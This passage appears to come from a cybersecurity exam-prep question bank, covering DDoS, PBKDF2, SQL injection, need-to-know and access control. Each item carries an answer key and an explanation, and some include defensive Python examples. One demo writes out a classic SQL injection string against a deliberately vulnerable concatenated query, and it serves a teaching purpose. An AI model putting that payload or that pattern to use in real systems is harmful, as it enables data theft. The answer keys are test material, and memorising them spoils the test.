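    return LEVELS[user_clearance[user]] >= LEVELS[object_label[obj]]

print(can_read("alice", "budget.xlsx"))   # True
print(can_read("alice", "ops_plan.doc"))  # False: clearance below label
```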
The primary advantage of MAC is its ability to minimize the risk of unauthorized disclosure or modification of sensitive information. By centralizing control and enforcing consistent policies, MAC reduces the potential for human error or malicious actions that could compromise data security. This model is widely used in government, military, and other high-security environments where data protection is paramount.
However, MAC implementation requires careful planning to balance security with operational efficiency. Overly restrictive policies can impede legitimate workflows, so organizations must design access rules thoughtfully, regularly review and update classifications, and ensure that enforcement mechanisms function as intended. When properly implemented, MAC provides a robust framework for maintaining strict access control, supporting regulatory compliance, and protecting highly sensitive information from unauthorized exposure or manipulation.
Question 156
Which attack type overwhelms a system or network with excessive traffic to cause service disruption?
(A) DDoS
(B) Phishing
(C) SQL injection
(D) Brute force
Answer: A
Explanation:
Distributed Denial of Service (DDoS) attacks are a type of cyberattack in which an attacker overwhelms a network, server, or application with an extremely high volume of traffic, rendering the targeted services unavailable to legitimate users. Unlike phishing, which relies on deceiving individuals into divulging sensitive information, SQL injection, which targets databases to execute malicious queries, or brute force attacks, which systematically attempt to guess passwords, DDoS attacks focus on exhausting system resources such as bandwidth, memory, or processing power to disrupt normal operations. Attackers often leverage networks of compromised devices, known as botnets, to amplify the scale and intensity of these attacks, making them difficult to mitigate using conventional defenses.
DDoS attacks can take various forms, including volumetric attacks that flood networks with large amounts of traffic, protocol attacks that exploit weaknesses in communication protocols, and application-layer attacks that target specific services or applications. The consequences of a successful DDoS attack can be severe, ranging from temporary service outages to reputational damage, financial losses, and disruption of critical business or infrastructure services.
Organizations mitigate the impact of DDoS attacks through a combination of technical strategies and proactive planning. Traffic filtering and rate limiting help manage and block malicious traffic, while network redundancy and the use of content delivery networks (CDNs) distribute traffic loads to reduce the risk of single points of failure. Specialized DDoS mitigation services and cloud-based solutions can absorb or deflect large-scale attacks. Continuous monitoring, early detection, and integration with intrusion detection systems enable rapid response and containment. Network segmentation and incident response planning further enhance resilience, ensuring that attacks on one segment do not compromise the entire infrastructure.
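The rate-limiting element mentioned above can be sketched as a sliding-window limiter; the 100-requests-per-10-seconds budget is arbitrary, and real DDoS defenses operate at far larger scale, often upstream of the application.

```python
# Sliding-window per-client rate limiter (simplified application-level example).
import time
from collections import defaultdict, deque

WINDOW, LIMIT = 10.0, 100
recent = defaultdict(deque)   # client IP -> timestamps of recent requests

def allow_request(ip):
    now = time.time()
    q = recent[ip]
    while q and now - q[0] > WINDOW:   # discard timestamps outside the window
        q.popleft()
    if len(q) >= LIMIT:
        return False                   # over budget: drop or challenge the client
    q.append(now)
    return True

for i in range(105):
    ok = allow_request("198.51.100.7")
print(ok)  # False once the client exceeds 100 requests within the window
```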
Effective DDoS management requires a multi-layered approach that combines preventive, detective, and corrective measures. By implementing these strategies, organizations can maintain service availability, protect critical infrastructure, safeguard customer trust, and reduce the operational and financial impact of malicious disruptions.
Question 157
Which method securely stores passwords by combining hashing, salting, and iterative computation?
(A) PBKDF2
(B) AES
(C) RSA
(D) TLS
Answer: A
Explanation:
PBKDF2 (Password-Based Key Derivation Function 2) secures password storage by applying a cryptographic hash function, a unique salt for each password, and multiple iterations to increase computational difficulty for attackers. AES is a symmetric encryption standard, RSA is an asymmetric encryption algorithm, and TLS secures data in transit but does not handle password storage. Salting ensures that identical passwords produce unique hashes, preventing precomputed attacks such as rainbow tables. Iterative computation slows brute force attacks, making it computationally expensive to crack passwords. Organizations using PBKDF2 protect credentials against database breaches, enhance compliance with security standards, and reduce exposure to password-related attacks. Regular updates and algorithm reviews maintain robust password security.
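Python's standard library exposes PBKDF2 directly; in this sketch the iteration count is an illustrative value and should follow current guidance for your deployment.

```python
# PBKDF2 password storage: per-password salt, many iterations, constant-time compare.
import hashlib, hmac, os

def hash_password(password: str, iterations: int = 600_000):
    salt = os.urandom(16)                          # unique salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest                # store all three, never the password

def verify(password: str, salt: bytes, iterations: int, expected: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, expected)  # constant-time comparison

salt, iters, stored = hash_password("correct horse battery staple")
print(verify("correct horse battery staple", salt, iters, stored))  # True
print(verify("guess123", salt, iters, stored))                      # False
```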
Question 158
Which method separates user input from SQL commands to prevent injection attacks?
(A) Parameterized Queries
(B) TLS
(C) VPN
(D) MAC Filtering
Answer: A
Explanation:
Parameterized queries, also known as prepared statements, prevent SQL injection by keeping user input separate from SQL commands. This ensures input cannot alter query logic. TLS encrypts data in transit, VPNs secure remote connections, and MAC filtering restricts device access based on hardware addresses. SQL injection targets databases, allowing attackers to read, modify, or delete data. Parameterized queries combined with input validation and stored procedures mitigate these risks effectively. Organizations implementing secure coding practices, regular testing, and web application firewalls strengthen database security. Parameterized queries are a foundational control in application security frameworks, preventing one of the most common and damaging web application vulnerabilities.
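The contrast between string concatenation and a parameterized query is easy to demonstrate with Python's built-in sqlite3; the table and data are created in memory purely for the demo.

```python
# Vulnerable string building vs. a parameterized query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "x' OR '1'='1"   # classic injection payload

# UNSAFE: input is concatenated into the SQL text and changes the query's logic.
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()
print("concatenated query leaked:", rows)       # returns every row

# SAFE: the ? placeholder sends input as data, never as SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print("parameterized query returned:", rows)    # returns nothing
```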
Question 159
Which principle restricts information access to only those individuals who require it for their work?
(A) Need-to-Know
(B) Principle of Least Privilege
(C) Defense in Depth
(D) Separation of Duties
Answer: A
Explanation:
The Need-to-Know principle restricts access to sensitive information to only those individuals who require it for their role, reducing unnecessary exposure. Least privilege limits permissions to the minimum required for tasks, Separation of Duties divides critical functions to prevent conflicts of interest, and Defense in Depth layers multiple security controls. Need-to-Know is critical in protecting classified data, intellectual property, and proprietary information. Implementation involves access control lists, data classification, auditing, and employee training. Periodic reviews ensure that permissions remain appropriate as roles or responsibilities change. Combining Need-to-Know with other access control models strengthens organizational security and prevents internal threats and data leakage. Proper enforcement is essential for regulatory compliance and information integrity.
Question 160
Which attack type involves sending unauthorized commands to a database to manipulate or steal information?
(A) SQL Injection
(B) XSS
(C) DDoS
(D) Phishing
Answer: A
Explanation:
SQL injection exploits web applications by sending malicious SQL commands to a database, potentially exposing, modifying, or deleting sensitive information. XSS targets web browsers, DDoS overwhelms systems, and phishing deceives users into revealing credentials. SQL injection occurs when input is improperly validated, allowing attackers to alter query logic. Prevention strategies include parameterized queries, input validation, stored procedures, web application firewalls, and secure coding practices. Regular security testing, vulnerability scanning, and database monitoring help identify and mitigate risks. SQL injection remains a critical web application threat, requiring proactive controls, user education, and layered defenses to maintain data confidentiality, integrity, and availability.